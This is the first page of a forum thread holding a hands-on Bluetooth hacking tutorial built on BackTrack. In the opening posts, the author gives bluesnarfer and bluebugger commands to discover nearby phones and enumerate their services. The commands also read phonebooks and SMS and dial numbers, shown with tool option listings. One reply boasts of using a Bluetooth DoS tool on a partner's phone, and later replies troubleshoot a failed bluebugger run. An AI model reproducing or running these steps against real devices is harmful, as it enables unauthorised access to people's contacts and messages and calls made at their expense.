Page 1 of 2 12 LastLast
Results 1 to 10 of 45

Thread: Bluesnarfer & Bluebugger Guide With Backtrack

Hybrid View

  1. #1
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Bluesnarfer & Bluebugger Guide With Backtrack

    Hey Guys

    Just thought I'd post a little on Bluetooth Hacking because I can see thereis a lot of questions and not alot of answers So here's how I hacked my samsung d600.

    First I poped to my local supermarket and picked myself up a bluetooth dongle for 6.99!!!! Because my shitieToshiba Satellite P100 doesn't have bluetooth

    Ok first lets configure BT.................

    Type :

    bt ~ # mkdir -p /dev/bluetooth/rfcomm
    mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    Thats Bluesnarfer done, now for bluebugger.............

    Type:

    bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

    Ok now we can fire up are Bluetooth adaptor, so type:

    bt ~ # hciconfig hci0 up

    Now are bluetooth adaptor should be ready, check by typing :

    bt ~ # hciconfig hci0

    and you should see somthing like this:

    hci0: Type: USB
    BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
    UP RUNNING
    RX bytes:85 acl:0 sco:0 events:9 errors:0
    TX bytes:33 acl:0 sco:0 commands:9 errors:0

    Ok now we are ready to scan so type:

    bt ~ # hcitool scan hci0

    And you should see all the devices in the area. You can also use btscanner and btscanner has a bruteforce scanner for discovering hidden devices.

    Now note the name and MAC of the target and let's move on.

    First thing lets try to ping are target. Type:

    l2ping <target MAC>

    If you dont get a ping GOOD LUCK

    Next we need to find out a little about the device we want to hack so lets fire up blueprint.

    And type:

    sdptools browse --tree --l2cap <target MAC>

    And you should get somthing like this:


    Code:
    Browsing 00:16:DB:A1:B6:B9 ...
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10000
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x1
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
      Data Sequence
        Code ISO639 (Integer) : 0x656e
        Encoding (Integer) : 0x6a
        Base Offset (Integer) : 0x100
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 57 42 54 45 58 54 00 00
    Attribute Identifier : 0x8003
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10001
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1101 - SerialPort
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x2
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1101 - SerialPort
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10002
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1103 - DialupNetworking (DUN)
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x3
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1103 - DialupNetworking (DUN)
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
    Attribute Identifier : 0x305
      Integer : 0x0
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10003
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1112 - HeadsetAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x4
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1108 - Headset
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10004
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x111f - HandsfreeAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x5
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x111e - Handsfree
          Version (Integer) : 0x101
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    Attribute Identifier : 0x301
      Integer : 0x1
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10005
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110a - AudioSource
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x19
        Data Sequence
          UUID16 : 0x0019 - AVDTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110d - AdvancedAudio
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10006
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110c - RemoteControlTarget
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x17
        Data Sequence
          UUID16 : 0x0017 - AVCTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110e - RemoteControl
          Version (Integer) : 0x100
    Attribute Identifier : 0x311
      Integer : 0x100
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10007
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1106 - OBEXFileTransfer
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x6
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1106 - OBEXFileTransfer
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10008
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1105 - OBEXObjectPush
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x7
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1105 - OBEXObjectPush
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
    Attribute Identifier : 0x303
      Data Sequence
        Integer : 0x1
        Integer : 0x3
        Integer : 0x5
        Integer : 0xff
    Now if you asked me what does this mean I wouldn't know, but I think it tells you abit about the channels and what services are running on what channel.

    Anyway after playing abit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is diffrent so you might have to try a few until you get the right one. Like I said im only just getting to grips with linux So if anybodu knows anymore I'd love to read about it.

    End Part 1

  2. #2
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Part 2

    Ok lets get to it ...... Start a shell and lets take a look at bluesnarfer's options so type:

    bt ~ # bluesnarfer

    And you should get :
    Code:
    bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION)
    
    TYPE      : valid phonebook type ..
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr : bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info
    Ok so now we have some options lets begin type:

    bluesnarfer [options] -C 7 -b <taget MAC>

    for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

    And the hack should start ........

    Now bluebugger Type:

    Bluebugger -h

    And you should get :
    Code:
    bluebugger 0.1 (cant post urls :D)
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE]
    
           -a <addr>     = Bluetooth address of target
    
           Options:
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup (default: 5)
           -o <file>     = Write output to <file>
    
           Mode:
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'
    Again now we have are options lets hack .............. Type:

    bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

    for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

    And again you should see some results.

    The only downside to hacking into my D600 is that you still have to allow it on the phone so its not exactly HACKING the D600 but its a good training session. And now you can go forth and play.

    Hope you lot can understand my bad spelling ETC and have fun

    PS : Can sombody swap these posts around? Sorry my fault and oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:

    hciconfig hci0 down
    hciconfig hci0 reset
    hciconfig hci0 up

    And all should be well.

  3. #3
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Dr_GrEen,

    Bravo!!!

    EXCELLENT TUTORIAL, AND WELCOME TO THE FORUMS!

    P.S.

    You know way 2 much about hacking Bluetooth to be a no0bie

    Moving to tutorial Section.

    Keep up the Great work!
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #4
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yep excellent work ..... i wish more new members contribute in such fruitful manner....

    welcome and don't hesitate to ask if you got pb on anything......

    BTW.... you may open an account on our wiki and add this tuto to our howto section.... could be really cool

    THX
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  5. #5
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Awesome tut man... was going to do a similar writeup, but time hasn't been my friend as of late

    Another fun tool I like to use to let my old lady know her time is up playing games on her Blackberry (after hours on end) is a BT DoS prog in the tbear suite tanya.
    dd if=/dev/swc666 of=/dev/wyze

  6. #6
    Junior Member NoobBiscUiT's Avatar
    Join Date
    Jun 2007
    Posts
    58

    Default

    ok so this is what i did and got.... i've been working with this for awhile now, and i HAVE searched everything, that's how i found this thread and other useful tools
    *with editing

    bluebugger -c 8 -a 00:19:A1:F6:00:75 dial 1434560092
    bluebugger 0.1 ( MaJoMu |
    -----------------------------------------

    Target Device: '00:19:A1:F6:00:75'
    Target Name: 'LG'

    tcgetattr failed: Input/output error
    bt_rfcomm_config() failed

    channel 8 is my bt modem, and i can connect to it BUT when it establishes a connection my phone asks for a passkey, and i enter a random character, then it says connection failed.
    im guessing there's a way to create a passkey between the phone and my computer through bt but i dont know how and thats why i'm asking this way too long question.
    guidance would be great.
    thanks
    Become the change you seek in the world. - Gandhi
    The important thing is not to stop questioning. - Albert Einstein
    Don't judge the unknown - Grindordie

  7. #7
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    3

    Default

    I've only used RFComm to do simple tasks and only with my cellular phone. So I can't really offer any advice on how to use that prog. But I do know that most of the time, except for in cellular phone pairing, there is a default passkey. A couple of different BT devices I own use 0000. Try that.

  8. #8
    Junior Member NoobBiscUiT's Avatar
    Join Date
    Jun 2007
    Posts
    58

    Default

    right, but i was using bluebugger so unless i have to do something with rfcomm first then why would that failure message come up.
    my understanding is that they are different programs and have nothing to do with each other

  9. #9
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Sorry didn't see this question lol

    Please enter this command and post results

    Code:
    sdptools browse --l2cap <target MAC>

  10. #10
    Junior Member NoobBiscUiT's Avatar
    Join Date
    Jun 2007
    Posts
    58

    Default

    deal,
    i believe i did this command when i first found my phone using btscanner,
    then l2ping like you said

    RESULTS.....wait. i didnt boot with my bluetooth.
    ok i'll re do this

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •